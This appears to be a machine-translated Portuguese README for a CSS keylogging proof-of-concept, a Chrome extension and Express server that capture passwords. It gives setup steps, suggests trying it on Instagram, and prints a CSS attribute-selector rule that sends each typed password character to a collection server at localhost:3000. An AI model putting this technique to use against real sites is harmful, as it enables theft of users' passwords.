Extensão do Chrome e servidor expresso que explora habilidades de keylogging de CSS.
Para usar a extensão do Chrome
- Repositório de download
git clone https://github.com/maxchehab/CSS-Keylogging - Visite
chrome://extensionsseu navegador (ou abra o menu do Google Chrome clicando no ícone à direita da omnibox: o ícone do menu tem três barras horizontais e selecione Extensões, no menu Mais ferramentas, para chegar ao mesmo local). - Verifique se a caixa de seleção do modo Desenvolvedor no canto superior direito está marcada.
- Clique
Load unpacked extension…para abrir uma caixa de diálogo de seleção de arquivos. - Selecione
css-keylogger-extensionno diretório que você baixou este repositório.
Servidor do Setup Express
yarnyarn start
Haxking l33t passw0rds
- Abra um site que use uma estrutura de componentes controlada, como React. https://instagram.com .
- Pressione a extensão
Cno canto superior direito de qualquer página da web. - Digite sua senha.
- Sua senha deve ser capturada pelo servidor expresso.
Como funciona
Esse ataque é muito simples. Utilizando seletores de atributos CSS, é possível solicitar recursos de um servidor externo sob a premissa de carregar umbackground-image.
Por exemplo, o seguinte css selecionará todas as entradas com umtypeigualpassworde umvalueque termina coma. Em seguida, ele tentará carregar uma imagem de.http://localhost:3000/a
input[type="password"][value$="a"] {
background-image: url("http://localhost:3000/a");
}Usando um script simples, você pode criar um arquivo css que enviará uma solicitação personalizada para cada caractere ASCII.
[sociallocker id=”1005″]
Download[/sociallocker]
